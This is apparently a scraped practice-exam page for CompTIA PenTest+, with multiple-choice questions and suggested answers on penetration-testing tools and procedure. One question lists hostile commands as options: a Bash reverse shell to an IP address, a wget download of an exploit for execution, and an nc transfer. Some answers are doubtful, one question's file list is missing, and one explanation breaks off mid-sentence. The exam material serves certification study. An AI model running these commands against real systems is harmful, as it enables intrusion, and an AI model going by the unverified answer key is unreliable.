ExamGecko
Home Home / CompTIA / PT0-002

CompTIA PT0-002 Practice Test - Questions Answers, Page 10

Question list
Search
Search

List of questions

Search

Related questions











Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

A.
will reveal vulnerabilities in the Modbus protocol.
A.
will reveal vulnerabilities in the Modbus protocol.
Answers
B.
may cause unintended failures in control systems.
B.
may cause unintended failures in control systems.
Answers
C.
may reduce the true positive rate of findings.
C.
may reduce the true positive rate of findings.
Answers
D.
will create a denial-of-service condition on the IP networks.
D.
will create a denial-of-service condition on the IP networks.
Answers
Suggested answer: B

Explanation:

Reference: https://www.hsdl.org/?view&did=7262

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

A.
OpenVAS
A.
OpenVAS
Answers
B.
Drozer
B.
Drozer
Answers
C.
Burp Suite
C.
Burp Suite
Answers
D.
OWASP ZAP
D.
OWASP ZAP
Answers
Suggested answer: A

Explanation:

OpenVAS is a full-featured vulnerability scanner.

OWASP ZAP = Burp Suite

Drozer (Android) = drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

Reference: https://pentest-tools.com/network-vulnerability-scanning/network-security-scanneronline-openvas

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.
Wait for the next login and perform a downgrade attack on the server.
A.
Wait for the next login and perform a downgrade attack on the server.
Answers
B.
Capture traffic using Wireshark.
B.
Capture traffic using Wireshark.
Answers
C.
Perform a brute-force attack over the server.
C.
Perform a brute-force attack over the server.
Answers
D.
Use an FTP exploit against the server.
D.
Use an FTP exploit against the server.
Answers
Suggested answer: B

Explanation:

Reference: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

A.
Acceptance by the client and sign-off on the final report
A.
Acceptance by the client and sign-off on the final report
Answers
B.
Scheduling of follow-up actions and retesting
B.
Scheduling of follow-up actions and retesting
Answers
C.
Attestation of findings and delivery of the report
C.
Attestation of findings and delivery of the report
Answers
D.
Review of the lessons learned during the engagement
D.
Review of the lessons learned during the engagement
Answers
Suggested answer: C

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A.
Edit the discovered file with one line of code for remote callback
A.
Edit the discovered file with one line of code for remote callback
Answers
B.
Download .pl files and look for usernames and passwords
B.
Download .pl files and look for usernames and passwords
Answers
C.
Edit the smb.conf file and upload it to the server
C.
Edit the smb.conf file and upload it to the server
Answers
D.
Download the smb.conf file and look at configurations
D.
Download the smb.conf file and look at configurations
Answers
Suggested answer: C

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

A.
Socat
A.
Socat
Answers
B.
tcpdump
B.
tcpdump
Answers
C.
Scapy
C.
Scapy
Answers
D.
dig
D.
dig
Answers
Suggested answer: C

Explanation:

https://thepacketgeek.com/scapy/building-network-tools/part-09/

A penetration tester ran the following command on a staging server:

python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

A.
nc 10.10.51.50 9891 < exploit
A.
nc 10.10.51.50 9891 < exploit
Answers
B.
powershell -exec bypass -f \\10.10.51.50\9891
B.
powershell -exec bypass -f \\10.10.51.50\9891
Answers
C.
bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
C.
bash -i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
Answers
D.
wget 10.10.51.50:9891/exploit
D.
wget 10.10.51.50:9891/exploit
Answers
Suggested answer: D

Explanation:

Reference: https://www.redhat.com/sysadmin/simple-http-server

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.
<#
A.
<#
Answers
B.
<$
B.
<$
Answers
C.
##
C.
##
Answers
D.
#$
D.
#$
Answers
E.
#!
E.
#!
Answers
Suggested answer: E

Explanation:

Reference: https://linuxconfig.org/bash-scripting-tutorial-for-beginners

#!/bin/bash ---# and ! makes this line special because # is used as comment line in bash. ! is called

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

A.
Create a custom password dictionary as preparation for password spray testing.
A.
Create a custom password dictionary as preparation for password spray testing.
Answers
B.
Recommend using a password manage/vault instead of text files to store passwords securely.
B.
Recommend using a password manage/vault instead of text files to store passwords securely.
Answers
C.
Recommend configuring password complexity rules in all the systems and applications.
C.
Recommend configuring password complexity rules in all the systems and applications.
Answers
D.
Document the unprotected file repository as a finding in the penetration-testing report.
D.
Document the unprotected file repository as a finding in the penetration-testing report.
Answers
Suggested answer: D

Which of the following is the MOST effective person to validate results from a penetration test?

A.
Third party
A.
Third party
Answers
B.
Team leader
B.
Team leader
Answers
C.
Chief Information Officer
C.
Chief Information Officer
Answers
D.
Client
D.
Client
Answers
Suggested answer: B
Total 422 questions
Go to page: of 43